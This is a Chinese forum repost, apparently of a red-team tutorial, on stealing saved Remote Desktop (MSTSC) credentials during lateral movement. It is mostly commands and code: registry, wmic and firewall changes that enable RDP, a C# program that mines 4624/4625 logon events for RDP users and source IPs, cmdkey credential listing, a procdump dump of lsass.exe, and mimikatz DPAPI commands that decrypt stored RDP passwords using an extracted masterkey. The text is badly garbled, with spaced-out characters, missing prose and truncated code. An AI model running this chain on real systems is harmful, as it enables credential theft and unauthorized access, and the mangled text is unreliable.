[18596] 2021-07-19_内网渗透横向移动中MSTSC的密码获取

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-07-19_内网渗透横向移动中MSTSC的密码获取   |   M S T S C   1 1 c c a a b   H A C K   2 0 2 1 - 0 7 - 1 9 #   , 2 #   , 2 0 #   , 2 #   , 3 p c p c m s t s c 0 x 0 1   3 3 8 9 1 . 1 3 3 8 9 T e r m S e r v i c e t a s k l i s t   / s v c   |   f i n d s t r   T e r m S e r v i c e
1 . 2 0 x 0 2   r d p 3 3 8 9 2 . 1 2 . 2 t a s k l i s t   / s v c   |   f i n d s t r   T e r m S e r v i c e n e t s t a t   - a n o   |   f i n d s t r   " p i d " R E G   Q U E R Y   " H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r W i n S t a t i o n s R D P - T c p "   / V   P o r t N u m b e r
0 x 0 3   3 3 8 9 w e b s h e l l 3 3 8 9 3 . 1 3 3 8 9 3 3 8 9 ( ) F o r   W i n 2 0 0 3 : n e t s h   a d v f i r e w a l l   f i r e w a l l   a d d   r u l e   n a m e = R e m o t e   D e s k t o p   p r o t o c o l = T C P   d i r = i n   l o c a l p o r t = 3 3 8 9   a c t i o n = a l l o w w m i c   R D T O G G L E   W H E R E   S e r v e r N a m e = ' % C O M P U T E R N A M E % '   c a l l   S e t A l l o w T S C o n n e c t i o n s   1 R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0
F o r   W i n 2 0 0 8 : F o r   E v e r y :   c m d 3 3 8 9   w i n 0 8   w i n 0 3   w i n 7   w i n 2 0 1 2   w i n x p   w i n 0 8 : 3 . 2 使 [ R e g f D e n y T S C o n n e c t i o n s . p s 1 ]   h t t p s : / / g i t h u b . c o m / Q A X - A - T e a m / E v e n t L o g M a s t e r / b l o b / m a s t e r / p o w e r s h e l l / R e g f D e n y T S C o n n e c t i o n s . p s 1 0 x 0 4   w i n d o w s i d 4 6 2 4 4 6 3 5 R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0     w m i c   / n a m e s p a c e : r o o t c i m v 2   e r m i n a l s e r v i c e s   p a t h   w i n 3 2 _ t e r m i n a l s e r v i c e s e t t i n g   w h e r e   ( _ _ C L A S S   ! =   " " )   c a l l   s e t a l l o w t s c o n n e c t i o n s       w m i c   / n a m e s p a c e : r o o t c i m v 2   e r m i n a l s e r v i c e s   p a t h   w i n 3 2 _ t s g e n e r a l s e t t i n g   w h e r e   ( T e r m i n a l N a m e   = ' R D P - T c p '     r e g   a d d   " H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r "   / v   f S i n g l e S e s s i o n P e r U s e r   / t   R E G _ D W O R D  
4 6 2 4 4 6 2 5 : :           I D :                 S Y S T E M                 :                 W I N - 4 B S 4 S H 0 0 L 5 N $         :                 R E D T E A M           I D :                 0 x 3 e 7 :                         1 0 :           I D :                 W I N - 4 B S 4 S H 0 0 L 5 N t e s t         :                 t e s t         :                 W I N - 4 B S 4 S H 0 0 L 5 N           I D :                 0 x f d 7 1 e           G U I D :                 { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } :           I D :                 0 x b c c         :                 C : W i n d o w s S y s t e m 3 2 w i n l o g o n . e x e :         :         W I N - 4 B S 4 S H 0 0 L 5 N         :         1 9 2 . 1 6 8 . 1 1 . 1 2         :                 6 3 2 7 5 :         :                 U s e r 3 2           :         N e g o t i a t e         :         -         (   N T L M ) :         -         :                 0
i t :           I D :                 S Y S T E M         :                 W I N - 4 B S 4 S H 0 0 L 5 N $         :                 W O R K G R O U P           I D :                 0 x 3 e 7 :                         2 :           I D :                 N U L L   S I D         :                 A d m i n i s t r a t o r         :                 W I N - 4 B S 4 S H 0 0 L 5 N :         :                         :                         0 x c 0 0 0 0 2 2 4         :                 0 x 0 :           I D :         0 x 1 8 4         :         C : W i n d o w s S y s t e m 3 2 w i n l o g o n . e x e :         :         W I N - 4 B S 4 S H 0 0 L 5 N         :         1 2 7 . 0 . 0 . 1         :                 0 :         :                 U s e r 3 2           :         N e g o t i a t e         :         -         (   N T L M ) :         -         :                 0 u s i n g   S y s t e m ; u s i n g   S y s t e m . C o l l e c t i o n s . G e n e r i c ; u s i n g   S y s t e m . D i a g n o s t i c s ; u s i n g   S y s t e m . L i n q ; u s i n g   S y s t e m . T e x t ; n a m e s p a c e   S h a r p E v e n t L o g {         c l a s s   P r o g r a m         {                 s t a t i c   v o i d   M a i n ( s t r i n g [ ]   a r g s )                 {                         i f   ( a r g s . L e n g t h   = =   0 )                         {                                 S y s t e m . C o n s o l e . W r i t e L i n e ( " U s a g e :   E v e n t L o g . e x e   - 4 6 2 4 " ) ;                                 S y s t e m . C o n s o l e . W r i t e L i n e ( "               E v e n t L o g . e x e   - 4 6 2 5 " ) ;                         }                         i f   ( a r g s . L e n g t h   = =   1   & &   a r g s [ 0 ]   = =   " - 4 6 2 4 " )                         {                                 E v e n t L o g _ 4 6 2 4 ( ) ;                         }                         i f   ( a r g s . L e n g t h   = =   1   & &   a r g s [ 0 ]   = =   " - 4 6 2 5 " )                         {                                 E v e n t L o g _ 4 6 2 5 ( ) ;                         }                        
                                        }                 p u b l i c   s t a t i c   v o i d   E v e n t L o g _ 4 6 2 4 ( )                 {                         E v e n t L o g   l o g   =   n e w   E v e n t L o g ( " s e c u r i t y " ) ;                         C o n s o l e . W r i t e L i n e ( " r n = = = = = = = = = =   4 6 2 4   = = = = = = = = = = r n " ) ;                         v a r   e n t r i e s   =   l o g . E n t r i e s . C a s t < E v e n t L o g E n t r y > ( ) . W h e r e ( x   = >   x . I n s t a n c e I d   = =   4 6 2 4 ) ;                         e n t r i e s . S e l e c t ( x   = >   n e w                         {                                 x . M a c h i n e N a m e ,                                 x . S i t e ,                                 x . S o u r c e ,                                 x . M e s s a g e ,                                 x . T i m e G e n e r a t e d                         } ) . T o L i s t ( ) ;                         f o r e a c h   ( E v e n t L o g E n t r y   l o g 1   i n   e n t r i e s )                         {                                 s t r i n g   t e x t   =   l o g 1 . M e s s a g e ;                                 s t r i n g   i p a d d r e s s   =   M i d S t r E x ( t e x t ,   "         :         " ,   "         : " ) ;                                 s t r i n g   u s e r n a m e   =   M i d S t r E x ( t e x t ,   " : " ,   " : " ) ;                                 u s e r n a m e   =   M i d S t r E x ( u s e r n a m e ,   "         :                 " ,   "         :                 " ) ;                                 D a t e T i m e   T i m e   =   l o g 1 . T i m e G e n e r a t e d ;                                 i f   ( i p a d d r e s s . L e n g t h   > =   7 )                                 {                                         C o n s o l e . W r i t e L i n e ( " r n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - " ) ;                                         C o n s o l e . W r i t e L i n e ( " T i m e :   "   +   T i m e ) ;                                         C o n s o l e . W r i t e L i n e ( " S t a t u s :   T r u e " ) ;                                         C o n s o l e . W r i t e L i n e ( " U s e r n a m e :   "   +   u s e r n a m e . R e p l a c e ( " n " ,   " " ) . R e p l a c e ( "   " ,   " " ) . R e p l a c e                                         C o n s o l e . W r i t e L i n e ( " R e m o t e   i p :   "   +   i p a d d r e s s . R e p l a c e ( " n " ,   " " ) . R e p l a c e ( "   " ,   " " ) . R e p l a c e                                 }                         }                 }                 p u b l i c   s t a t i c   v o i d   E v e n t L o g _ 4 6 2 5 ( )                 {                         E v e n t L o g   l o g   =   n e w   E v e n t L o g ( " S e c u r i t y " ) ;                         C o n s o l e . W r i t e L i n e ( " r n = = = = = = = = = =   4 6 2 5   = = = = = = = = = = r n " ) ;                         v a r   e n t r i e s   =   l o g . E n t r i e s . C a s t < E v e n t L o g E n t r y > ( ) . W h e r e ( x   = >   x . I n s t a n c e I d   = =   4 6 2 5 ) ;                         e n t r i e s . S e l e c t ( x   = >   n e w                         {                                 x . M a c h i n e N a m e ,                                 x . S i t e ,                                 x . S o u r c e ,                                 x . M e s s a g e ,                                 x . T i m e G e n e r a t e d                         } ) . T o L i s t ( ) ;                         f o r e a c h   ( E v e n t L o g E n t r y   l o g 1   i n   e n t r i e s )                         {                                 s t r i n g   t e x t   =   l o g 1 . M e s s a g e ;                                 s t r i n g   i p a d d r e s s   =   M i d S t r E x ( t e x t ,   "         :         " ,   "         : " ) ;                                 s t r i n g   u s e r n a m e   =   M i d S t r E x ( t e x t ,   " : " ,   " : " ) ;                                 u s e r n a m e   =   M i d S t r E x ( u s e r n a m e ,   "         :                 " ,   "         :                 " ) ;                                 D a t e T i m e   T i m e   =   l o g 1 . T i m e G e n e r a t e d ;                                 i f   ( i p a d d r e s s . L e n g t h   > =   7 )                                 {                                         C o n s o l e . W r i t e L i n e ( " r n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - " ) ;                                         C o n s o l e . W r i t e L i n e ( " T i m e :   "   +   T i m e ) ;                                         C o n s o l e . W r i t e L i n e ( " S t a t u s :   F l a s e " ) ;                                         C o n s o l e . W r i t e L i n e ( " U s e r n a m e :   "   +   u s e r n a m e . R e p l a c e ( " n " ,   " " ) . R e p l a c e ( "   " ,   " " ) . R e p l a c e                                         C o n s o l e . W r i t e L i n e ( " R e m o t e   i p :   "   +   i p a d d r e s s . R e p l a c e ( " n " ,   " " ) . R e p l a c e ( "   " ,   " " ) . R e p l a c e                                 }                         }                 }                 p u b l i c   s t a t i c   s t r i n g   M i d S t r E x ( s t r i n g   s o u r s e ,   s t r i n g   s t a r t s t r ,   s t r i n g   e n d s t r )                 {                         s t r i n g   r e s u l t   =   s t r i n g . E m p t y ;                         i n t   s t a r t i n d e x ,   e n d i n d e x ;
0 x 0 5   m s t s c - 5 . 1 p r o c d u m p 6 4                         i n t   s t a r t i n d e x ,   e n d i n d e x ;                         s t a r t i n d e x   =   s o u r s e . I n d e x O f ( s t a r t s t r ) ;                         i f   ( s t a r t i n d e x   = =   - 1 )                                 r e t u r n   r e s u l t ;                         s t r i n g   t m p s t r   =   s o u r s e . S u b s t r i n g ( s t a r t i n d e x   +   s t a r t s t r . L e n g t h ) ;                         e n d i n d e x   =   t m p s t r . I n d e x O f ( e n d s t r ) ;                         i f   ( e n d i n d e x   = =   - 1 )                                 r e t u r n   r e s u l t ;                         r e s u l t   =   t m p s t r . R e m o v e ( e n d i n d e x ) ;                         r e t u r n   r e s u l t ;                 }         } } c m d k e y   / l d i r   / a   % u s e r p r o f i l e % A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s * p r o c d u m p 6 4 . e x e   - a c c e p t e u l a   - m a   l s a s s . e x e   l s a s s . d m p
使 m i m i k a t z g u i d M a s t e r K e y : d m p M a s t e r K e y : { 1 2 f 0 3 7 b 9 - d f 4 2 - 4 d c f - b 9 e 0 - 3 1 b 5 7 d 2 6 c 5 4 4 } m i m i k a t z . e x e   " d p a p i : : c r e d   / i n : C : U s e r s j a c k A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s B 5 7 C 0 6 3 0 F 4 9 B B 2 6 F 2 8 4 E C F D 8 D C D 9 E 0 A 2 "
使 M a s t e r K e y 5 . 2 R D P s v c h o s t s v c h o s t s v c h o s t h o s t s   b a 3 e b b 5 3 7 4 e a 4 6 2 3 a 1 f c c 0 0 6 a c 4 5 5 2 b b b 1 7 3 0 1 b 5 3 9 e 6 2 c 0 6 6 f 7 f 4 e 8 b a 2 9 3 1 7 8 9 a 4 8 6 9 9 e 2 7 6 f 5 6 9 5 3 5 f 1 2 d c 7 a 1 f 4 2 b b b c c d 3 5 e 5 1 c 6 0 f 1 9 e e 3 5 6 0 e e 1 5 5 d 9 a 7 c 0 7 8 m i m i k a t z . e x e   " s e k u r l s a : : m i n i d u m p   l s a s s . d m p "   " s e k u r l s a : : d p a p i "   " e x i t "   >   2 . t x t m i m i k a t z . e x e   " d p a p i : : c r e d   / i n : C : U s e r s j a c k A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s B 5 7 C 0 6 3 0 F 4 9 B B 2 6 F 2 8 4 E C F D 8 D C D 9 E 0 A 2   / m a s t e r k e y : b a 3 e b b 5 3 7 4 e a 4 6 2 3 a 1 f c c 0 0 6 a c 4 5 5 2 b b b 1 7 3 0 1 b 5 3 9 e 6 2 c 0 6 6 f 7 f 4 e 8 b a 2 9 3 1 7 8 9 a 4 8 6 9 9 e 2 7 6 f 5 6 9 5 3 5 f 1 2 d c 7 a 1 f 4 2 b b b c c d 3 5 e 5 1 c 6 0 f 1 9 e e 3 5 6 0 e e 1 5 5 d 9 a 7 c 0 7 8 " s c   q u e r y e x   t e r m s e r v i c e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则